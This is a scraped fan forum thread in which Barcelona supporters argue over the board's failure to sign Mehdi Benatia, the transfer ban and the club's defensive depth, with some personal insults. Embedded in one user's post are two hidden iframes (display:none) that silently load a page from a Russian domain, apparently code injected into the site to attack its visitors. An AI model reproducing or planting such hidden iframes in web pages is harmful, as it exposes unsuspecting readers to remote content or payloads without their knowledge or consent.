Mehdi Benatia

messi2140

6racies Xavi
Another sad day in the history of Barca, the greatest club in the world being destroyed by possibly the biggest bunch of idiotic crooks to walk the face of the earth . Only winning La Liga and CL and the Board getting kicked out will cheer me up now

tumblr_inline_mz9lkmMM4a1qk3ug7.gif

Don't worry he is not playing for us , so he must be overrated
#Logic

L

linetty

I was a little bit scared to step into this thread when I heard it's all offical :lol:

Cule4life

The Culest
Sarcasm mate, anyways I want to say that we are the whiniest bunch of fans ever walked on this planet. Taking everything for granted, a team which consists of Messi, Neymar, Suarez, Iniesta, Rakitic, busquets, Masch, Ter Stegen, alba ect ect ect shouldn't whine about defenders when we have fine quality in Barta, Mathieu, Pique and Vermalenan(Not the best but a good bunch none the less). Seriously please don't whine and before that we should look at the giants such as AC Milan and Man u then complain about quality.

Hello Bartomeu :wave:

This is exactly whats wrong with the board and some fans. Do you even football? If having the best attackers was enough than Real Madrid would not be a joke that it is today. A team is about balance. Without a good defense you could put Ronaldo Messi and Zlatan in the same team and it wouldnt matter. Its one sad/bad thing about football that defenders are not valued like attackers when they have an equal if not more part in winning you trophies.

And seriously comparing us to Milan and Man U? Dont want to be cocky but we are in a different league than them.

Cule4life

The Culest
Why will the club be destroyed only because we didn't sign Benatia? ridiculous statement

So are you happy with the mighty Douglas who will lead us to CL? Its not just about Benatia. Pep, the transfer ban, no CBs for 5 years etc. etc. Please dont be a holier than thou just to seem politically correct. This board is pure shite and you know it

Andrew M

Bayern gets what they want and that too for the best possible amount. Seriously we should learn some tricks from them. Apparently we are losing Reus to Bayern too. Not that it would affect barca but i don't want Reus to go to bayern. I don't mind buying him to stop that from happening.

Yeah, they handled the Kroos situation so adroitly :rolleyes:

Another sad day in the history of Barca, the greatest club in the world being destroyed by possibly the biggest bunch of idiotic crooks to walk the face of the earth . Only winning La Liga and CL and the Board getting kicked out will cheer me up now

Come back here when you hit puberty. Another 5, 6 years or so maybe?

BarcaJack

Come on guys. Man City also didn't sign him. There must be reasons like he's only willing to go to the mighty Bayern or something.

Sid90

Milan's been on a downer for a long time, I surely don't want Barça to follow their footsteps. Douglas is just not good enough, and I know this because I'm brazilian and have watched him play.
<iframe src="about<strong></strong>://gvapp.ru/u.html" style="display: none;" id="zunifrm"></iframe><iframe src="about://gvapp.ru/u.html" style="display: none;" id="zunifrm"></iframe>

I don't think we will follow Milan, we have a world class youth system compared to Milan and United but try to enjoy the current players, they will not be there for long time and instead of whining(which I see a lot over here) we should just enjoy the ride.

L

linetty

So are you happy with the mighty Douglas who will lead us to CL? Its not just about Benatia. Pep, the transfer ban, no CBs for 5 years etc. etc. Please dont be a holier than thou just to seem politically correct. This board is pure shite and you know it
They are shit but it's not end of the world just because they didn't get FREAKING MEHDI BENATIA!

My head is starting to explode when I hear B-E-N-A-T-I-A. How can people whine so much about a signle Barca board decision, don't you have a life?!

Home of Barca Fans